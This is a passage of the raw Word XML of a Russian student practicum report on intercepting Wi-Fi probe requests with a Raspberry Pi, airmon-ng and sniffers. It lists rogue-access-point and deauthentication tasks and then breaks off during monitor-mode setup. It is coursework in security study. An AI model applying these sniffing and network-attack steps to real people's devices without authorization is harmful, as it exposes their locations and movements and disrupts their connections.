          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="699178E7" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_heading=h.30j0zll" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="4" w:name="_Toc75213384"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Введение</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="0CD8250A" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB333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Учебная (по получению первичных профессиональных умений и навыков, в том числе первичных умений и навыков научно-исследовательской деятельности) практика проходила на кафедре информационной безопасности ШЕН ДВФУ в период с 22 февраля 2021 года по 26 июня 2021 года.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B11B26B" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Целью прохождения практики является </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>приобретение практических и теоретических навыков по специальности, а также навыков оформления проведенного исследования в отчетной форме.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50F69F24" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB333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Задачи практики:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204413FA" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Ознакомиться с теоретическими основами беспроводной передачи данных посредством Wi-Fi-сетей;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EBF26DF" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Приобрести и настроить для дальнейшей работы микрокомпьютер Raspberry Pi 3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36433D09" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Изучить и реализовать программу по управлению технологией перехвата Probe Request запросов и провести анализ перехваченных данных;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C895E35" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Изучить и реализовать программу по управлению технологией создания ложной Wi-Fi точки доступа;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CEFEC39" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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Изучить и реализовать программу по управлению технологией отключения конечного пользователя от Wi-Fi точки доступа;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B461FCC" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing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Написать отчет о проделанной работе.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3EADD3" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9F53E4" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_heading=h.1fob9te" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="6" w:name="_Toc75213385"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Теоретическая часть</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="3A621C4F" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB333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Эволюция беспроводных соединений и последующее повсеместное распространение Wi-Fi инфраструктуры обеспечили возможность, анализируя соединение между клиентом и точкой доступа, получать различную информацию о человеке. Это может быть его местоположение, схема передвижений, информация о других активностях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E4CB4E" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB333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стандарту IEEE 802.11 мобильные устройства могут работать в двух режимах при подключении к сети: в режиме пассивного сканирования и в режиме активного сканирования. Если устройство находится в пассивном режиме, оно прослушивает маячковые сообщения (beacon frames), которые рассылаются точками доступа по определённым каналам, таким образом, предлагая клиентам подключиться к этим точкам. Сканирование происходит полностью в пассивном режиме, из-за чего может потратиться много времени для того, чтобы просканировать все каналы на частоте 2.4 ГГц (примерно 1150 мс). При активном же сканировании мобильные устройства продолжительное время рассылают пакеты, называемые Probe Request запросы, и таким образом происходит поиск сетей, к которым устройство было когда-то подключено, чтобы автоматически переподключиться к ним. Для сканирования одного канала в среднем необходимо 8 мс, что намного быстрее чем, если бы устройство находилось в режиме пассивного сканирования. Probe Request запросы содержат уникальные MAC-адреса устройств и имя сети, поиск которой ведётся в данный момент.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4458498D" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB333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Незашифрованные Probe Request запросы можно перехватить с помощью недорогих устройств, либо программ, называющихся Wi-Fi снифферами. К примеру, для их перехвата можно использовать микрокомпьютер Raspberry Pi с установленной на него системой Linux. Для этого необходимо перевести сетевой адаптер в режим мониторинга, который позволяет адаптеру не ассоциировать себя с какой-либо сетью и принимать все видимые ему пакеты. Для перевода в данный режим есть различные способы, но самым популярным является использование утилиты </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>airmon-ng</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 xml:space="preserve">(необходимо в консоли прописать команду </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>airmon-ng start</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> “название сетевого интерфейса”). После включения режима мониторинга остаётся лишь запустить любой сниффер, например, Wireshark, который позволяет перехватывать и анализировать весь трафик, проходящий между клиентом и точкой доступа.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0A7460" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E1F4BA9" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A6627F" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_heading=h.3znysh7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="8" w:name="_Toc75213386"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая часть</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="071D5C49" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57"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выполнения работы было использовано следующее оборудование и ПО:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6A0E33" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="57" w:after="57"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Одноплатный компьютер Raspberry Pi (в нашем случае использовалась версия 3B);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAF7E69" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="57" w:after="57"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Внешний Wi-Fi адаптер для дистанционного управления устройством;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769171B6" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="57" w:after="57"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Kali Linux RaspberryPi OS;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44C43EB7" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="57" w:after="57"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Периферийные устройства и карта памяти;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A6C607" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="57" w:after="57"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Набор утилит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>aircrack-ng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1407C254" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="57" w:after="57"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Утилита для сбора и прослушки сетевого трафика: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>tcpdump;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B6C472" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:before="57" w:after="57"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Python 3; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669AF82B" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57"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Как и любой компьютер Raspberry Pi нуждается в операционной системе. Ввиду того, что официальные версии операционных систем для Raspberry Pi не позволяют переводить встроенный Wi-Fi адаптер в режим мониторинга, нами была установлена модифицированная версия этой системы. Ее использование обусловлено еще и тем, что купленный нами внешний Wi-Fi адаптер оказался непригодным для перевода в режим мониторинга.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622F70A5" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57"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Основным накопителем данных в Raspberry Pi является MicroSDHC карта, поэтому установка ОС имеет свою специфику. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ввиду использования готового образа системы,</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> установка нам не потребовалась.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510160C7" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57"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Важным шагом является установка драйверов для Wi-Fi адаптера. Как упоминалось выше, его ревизия отличается от совместимой с режимом мониторинга, поэтому для корректной установки понадобились некоторые правки в настройках системы. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEA8F48" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57"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После установки необходимого ПО можно приступать к основной части работы. Так как для питания микрокомпьютера используется съемный накопитель энергии, с точки зрения удобства управления и сохранения запаса питания целесообразно не использовать графический интерфейс системы, а управлять ей удаленно. В нашем случае был использован протокол </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D878098" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251656192" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="6D915F9D" wp14:editId="7D0DEB4A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>26669</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6120130" cy="1696720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="0" distR="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6120130" cy="1696720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="225D0CFB" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57"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Далее необходимо убедиться в том, что система видит оба Wi-Fi адаптера (внешний и внутренний) посредством команды </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ifconfig.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> На выводе видим два адаптера: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>wlan1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>wlan0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. В процессе работы имена интерфейсов поменяются местами, поэтому в качестве интерфейса для мониторинга будет использоваться </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>wlan0mon</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для перевода сетевой карты в режим мониторинга воспользуемся утилитой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>airmon-ng</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. Сначала узнаем, к какому интерфейсу привязан наш внутренний адаптер (его мы и будем переводить в режим мониторинга) при помощи </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>sudo airmon-ng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C7B0C7" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" hidden="0" allowOverlap="1" wp14:anchorId="1A086D65" wp14:editId="50598ABD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-634</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>7620</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5438775" cy="1352550"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides" distT="0" distB="0" distL="0" distR="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438775" cy="1352550"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D5B9F5" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="434BA28D" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47A7DE0E" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DFE88F8" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78D94950" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57"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Видим, что внешний адаптер привязан к интерфейсу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>wlan0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, а внутренний — к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>wlan1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DE7D3F" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57"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Переведем теперь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>wlan1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> в режим мониторинга командой</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo airmon-ng start wlan1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C77A50A" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:spacing w:before="57" w:after="57" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
